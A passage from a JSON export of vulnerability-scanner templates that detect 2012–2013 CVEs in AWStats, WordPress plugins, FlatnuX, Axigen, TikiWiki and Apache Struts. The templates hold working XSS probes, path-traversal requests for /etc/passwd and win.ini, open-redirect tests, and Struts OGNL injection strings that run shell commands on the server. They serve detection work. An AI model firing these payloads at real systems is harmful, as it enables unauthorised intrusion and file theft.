cve2012,cve,xss,awstats,edb,laurent_destailleur\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'\n - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n stop-at-first-match: true\n\n 
matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008ad1450141ffe1e2f5bc5fff041d0ead294f0d0840e282a6899d94c4c3c5a4b602202959bd6bd270091875aafae17397f2d5c2d7ba45419a18a9b77f7c644dcc0df9:922c64590222798bb761d5b6d8e72950", "hash": "4049959e32d5dce198562c7c3656a71b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef6" }, "name": "CVE-2012-4768.yaml", "content": "id: CVE-2012-4768\n\ninfo:\n name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4768\n - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt\n - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/78422\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4768\n cwe-id: CWE-79\n epss-score: 0.00922\n epss-percentile: 0.82559\n cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: mikejolley\n product: download_monitor\n 
framework: wordpress\n tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Download Monitor ='\n\n - method: GET\n path:\n - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205596660b46c16f46c755d2225e3fc5684054c8e27fa6b703b994fd0acf54ec0702207a5e8e62ed31287f9914ce7109abe2aea74b8340bfda5b6b2730920832a41b96:922c64590222798bb761d5b6d8e72950", "hash": "ad9cbb3fa1b4f6f35f89eb2925d45f75", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef7" }, "name": "CVE-2012-4878.yaml", "content": "id: CVE-2012-4878\n\ninfo:\n name: FlatnuX CMS - Directory Traversal\n author: daffainfo\n severity: medium\n description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.\n impact: |\n An attacker can read or modify sensitive files on the server, potentially leading to unauthorized access and data leakage.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS.\n reference:\n - https://www.exploit-db.com/exploits/37034\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4878\n - http://www.vulnerability-lab.com/get_content.php?id=487\n - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/74568\n classification:\n cvss-metrics: 
CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N\n cvss-score: 5\n cve-id: CVE-2012-4878\n cwe-id: CWE-22\n epss-score: 0.00608\n epss-percentile: 0.7813\n cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: flatnux\n product: flatnux\n tags: cve,cve2012,lfi,traversal,edb,packetstorm,flatnux,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022004d8fe62c4b1e4ae5fad5b00d2fbb3ac41df89d07c06c9e48d5c952daafaa270022074ccc1e336fd99ee274e49b7329eee333556e948e73146f43ea24bb859d484ab:922c64590222798bb761d5b6d8e72950", "hash": "39433ed18047b672f10d46dde94cc5bf", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef8" }, "name": "CVE-2012-4889.yaml", "content": "id: CVE-2012-4889\n\ninfo:\n name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4889\n - http://packetstormsecurity.org/files/111474/VL-437.txt\n - http://www.vulnerability-lab.com/get_content.php?id=437\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/74538\n - 
https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-4889\n cwe-id: CWE-79\n epss-score: 0.03526\n epss-percentile: 0.91352\n cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: manageengine\n product: firewall_analyzer\n tags: cve,cve2012,xss,manageengine,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206873d1a172063dc9a5a94a9f66edea5ecbe5e334fead9102b967749fc37c8c58022100e18a924b1471c89a90d61dfaa30a48404a730f05848f837747358b8095d8093e:922c64590222798bb761d5b6d8e72950", "hash": "d77de71301e990068b38f25dd1d8210a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ef9" }, "name": "CVE-2012-4940.yaml", "content": "id: CVE-2012-4940\n\ninfo:\n name: Axigen Mail Server Filename Directory Traversal\n author: dhiyaneshDk\n severity: medium\n description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. 
(dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.\n impact: |\n An attacker can read sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server.\n reference:\n - https://www.exploit-db.com/exploits/37996\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4940\n - http://www.kb.cert.org/vuls/id/586556\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N\n cvss-score: 6.4\n cve-id: CVE-2012-4940\n cwe-id: CWE-22\n epss-score: 0.16414\n epss-percentile: 0.95527\n cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: gecad\n product: axigen_free_mail_server\n tags: cve,cve2012,edb,axigen,lfi,mail,gecad\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini'\n - '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini'\n\n stop-at-first-match: true\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 490a004630440220135dfc4a7ae9664bb15c696ab57100ebe3aac536a3149a7c2e85379d9c2385b802202532abf6841721c06135ae12e7fa664254438c6abe917cf0d2b6d7bec3372034:922c64590222798bb761d5b6d8e72950", "hash": "0a5abcc83f3c0962f9f6746643fa52b5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efa" }, "name": "CVE-2012-4982.yaml", "content": "id: CVE-2012-4982\n\ninfo:\n name: Forescout CounterACT 6.3.4.1 - Open Redirect\n author: ctflearner\n severity: medium\n description: 
|\n Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/38062\n - https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2012-4982\n - http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html\n - https://github.com/tr3ss/newclei\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2012-4982\n cwe-id: CWE-20\n epss-score: 0.00357\n epss-percentile: 0.71561\n cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: forescout\n product: counteract\n tags: cve,cve2012,redirect,forescout,counteract\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/assets/login?a=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a00483046022100a867f8c46181e25c0ee65381c656fd5b0908d6074f18923c3e96c2754c8995b8022100888f743fb311fd2ddba83def7cad4a6946a20a18d6b17fa3ed8b1151808c8154:922c64590222798bb761d5b6d8e72950", "hash": "2eb7a91258c3fa3fc8b351defb5dab78", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efb" }, "name": "CVE-2012-5321.yaml", "content": "id: CVE-2012-5321\n\ninfo:\n name: TikiWiki CMS Groupware v8.3 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n tiki-featured_link.php in TikiWiki 
CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka \"frame injection\"\n impact: |\n Successful exploitation of this vulnerability could lead to phishing attacks and potential unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-5321\n - https://www.exploit-db.com/exploits/36848\n - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2012-5321\n cwe-id: CWE-20\n epss-score: 0.01926\n epss-percentile: 0.87386\n cpe: cpe:2.3:a:tiki:tikiwiki_cms\\/groupware:8.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tiki\n product: tikiwiki_cms\\/groupware\n shodan-query: http.html:\"tiki wiki\"\n tags: cve,cve2012,redirect,tikiwiki,groupware,tiki\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n# digest: 4a0a0047304502200b62703373e2f3e77eb8233099e45a6a4a8f45c65a0bc93dff836558b4cfb495022100c5fdc97c693593011215fd012ea56914958970b70e474b725121e087a9eeb6b9:922c64590222798bb761d5b6d8e72950", "hash": "063e2392f26d0773e1897f95825946b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efc" }, "name": "CVE-2012-5913.yaml", "content": "id: CVE-2012-5913\n\ninfo:\n name: WordPress Integrator 1.32 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in 
wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2012-5913\n - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/\n - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html\n - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt\n - https://exchange.xforce.ibmcloud.com/vulnerabilities/74475\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2012-5913\n cwe-id: CWE-79\n epss-score: 0.01863\n epss-percentile: 0.88104\n cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wordpress_integrator_project\n product: wordpress_integrator\n tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Wordpress Integrator'\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100ea3e56bc8e49a770281df2e8b026ec3be23baa0ef2e3da32f1147ceaf60967f10221009b3c50d18e05bff4a07bb4297543372e6e32f0e6b981d5bc272709148a674f63:922c64590222798bb761d5b6d8e72950", "hash": "3ab8dedf9d009e03549db5949b61b413", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efd" }, "name": "CVE-2012-6499.yaml", "content": "id: CVE-2012-6499\n\ninfo:\n name: WordPress Plugin Age Verification v0.4 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.\n remediation: |\n Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed.\n reference:\n - https://www.exploit-db.com/exploits/18350\n - https://wordpress.org/plugins/age-verification\n - https://nvd.nist.gov/vuln/detail/CVE-2012-6499\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2012-6499\n cwe-id: CWE-20\n epss-score: 0.01204\n epss-percentile: 0.83755\n cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: age_verification_project\n product: age_verification\n tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification,age_verification_project\n\nhttp:\n - raw:\n - |\n POST /wp-content/plugins/age-verification/age-verification.php HTTP/1.1\n Host: {{Hostname}}\n\n redirect_to=http://www.interact.sh&age_day=1&age_month=1&age_year=1970\n\n matchers:\n - type: regex\n part: header\n regex:\n - 
'(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$'\n# digest: 4b0a00483046022100c6dc5b887e4ace1683bd8c4f901328e58b99002898e4ca33ed7adf2eead45ac6022100a33436c7adb1f789a65f478a78a2d645cf1b42813d472aa216d6621bb137fe5e:922c64590222798bb761d5b6d8e72950", "hash": "4c351fdc9af29e44dbf2a3d345c58d19", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307efe" }, "name": "CVE-2013-1965.yaml", "content": "id: CVE-2013-1965\n\ninfo:\n name: Apache Struts2 S2-012 RCE\n author: pikpikcu\n severity: critical\n description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution on the affected server.\n remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later.\n reference:\n - http://struts.apache.org/development/2.x/docs/s2-012.html\n - https://nvd.nist.gov/vuln/detail/CVE-2013-1965\n - https://bugzilla.redhat.com/show_bug.cgi?id=967655\n - https://github.com/CrackerCat/myhktools\n - https://github.com/GhostTroops/myhktools\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C\n cvss-score: 9.3\n cve-id: CVE-2013-1965\n cwe-id: CWE-94\n epss-score: 0.00813\n epss-percentile: 0.79935\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve2013,cve,apache,rce,struts,ognl\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/user.action\"\n\n body: |\n 
name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n\n headers:\n Content-Type: application/x-www-form-urlencoded\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f3c4ea08f6397b41fd80895e319d48ec44eb60d7323eafa2fea35ccd3bf55a47022100d082342c8746730798f1f6bb1b9a2f52cf7276b08735950ba32c192f9ca7b7d9:922c64590222798bb761d5b6d8e72950", "hash": "90e4dd71d7b9f756589ff2b5ee272041", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307eff" }, "name": "CVE-2013-2248.yaml", "content": "id: CVE-2013-2248\n\ninfo:\n name: Apache Struts - Multiple Open Redirection Vulnerabilities\n author: 0x_Akoko\n severity: medium\n description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.\n impact: |\n An attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware.\n remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.\n reference:\n - https://www.exploit-db.com/exploits/38666\n - https://nvd.nist.gov/vuln/detail/CVE-2013-2248\n - https://cwiki.apache.org/confluence/display/WW/S2-017\n - http://struts.apache.org/release/2.3.x/docs/s2-017.html\n - 
http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N\n cvss-score: 5.8\n cve-id: CVE-2013-2248\n cwe-id: CWE-20\n epss-score: 0.97268\n epss-percentile: 0.99838\n cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve2013,cve,apache,redirect,struts,edb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.action?redirect:http://www.interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 4b0a0048304602210097e5f1c5992fd137ee9d5d2670140430f951cc20184ef1ed7a7e29b86b39c799022100a1ee651b62a2b6686d84b3e91e268b379fc002179a6094743d68c357e8ffe4b6:922c64590222798bb761d5b6d8e72950", "hash": "63078bd7d4452213911fe7ea253d914b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f00" }, "name": "CVE-2013-2251.yaml", "content": "id: CVE-2013-2251\n\ninfo:\n name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution\n author: exploitation,dwisiswant0,alex\n severity: critical\n description: In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. 
This introduces the possibility to inject server side code.\n impact: |\n This vulnerability can lead to remote code execution, allowing attackers to take control of the affected system.\n remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later.\n reference:\n - http://struts.apache.org/release/2.3.x/docs/s2-016.html\n - https://cwiki.apache.org/confluence/display/WW/S2-016\n - https://nvd.nist.gov/vuln/detail/CVE-2013-2251\n - http://archiva.apache.org/security.html\n - http://cxsecurity.com/issue/WLB-2014010087\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C\n cvss-score: 9.3\n cve-id: CVE-2013-2251\n cwe-id: CWE-20\n epss-score: 0.97432\n epss-percentile: 0.99936\n cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 9\n vendor: apache\n product: struts\n tags: cve2013,cve,rce,struts,apache,ognl,kev\n\nhttp:\n - raw:\n - |\n GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n GET 
/index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n payloads:\n params:\n - \"redirect\"\n - \"action\"\n - \"redirectAction\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"((u|g)id|groups)=[0-9]{1,4}\\\\([a-z0-9]+\\\\)\"\n\n - type: status\n status:\n - 200\n - 400\n condition: or\n# digest: 4a0a00473045022062e0cb846ba394c9a5c920acbb426e26237ddcb9c85be74cfa1934bdfac87c1d022100e2f4211c8c9f909a7ae3a8cc4ee084edefd5263409517af8a3721ea88436d041:922c64590222798bb761d5b6d8e72950", "hash": "9b1ce112d72fee1fb481872a68773e4d", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f01" }, "name": "CVE-2013-2287.yaml", "content": "id: CVE-2013-2287\n\ninfo:\n name: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the WordPress Plugin Uploader or 
apply a patch provided by the vendor to fix the XSS vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2013-2287\n - https://www.dognaedis.com/vulns/DGS-SEC-16.html\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/d4n-sec/d4n-sec.github.io\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2013-2287\n cwe-id: CWE-79\n epss-score: 0.00219\n epss-percentile: 0.59251\n cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: roberta_bramski\n product: uploader\n google-query: inurl:\"/wp-content/plugins/uploader\"\n tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/uploader/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Uploader'\n - \"Tags:\"\n condition: and\n\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202164b09280ac9e1924ee544d73625fd749c8015fe8680a575c7dffda5863f6470221009100d6ff15c2a8d8c9c666b7b1bc7e9ef94c3b1f08024e4b5977c3627d98a900:922c64590222798bb761d5b6d8e72950", "hash": "a548216683c7e1aa0f0e7d930ff8bc3d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f02" }, "name": "CVE-2013-2621.yaml", "content": "id: CVE-2013-2621\n\ninfo:\n name: Telaen => v1.3.1 - Open Redirect\n author: ctflearner\n severity: medium\n description: |\n Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.\n impact: |\n An attacker can 
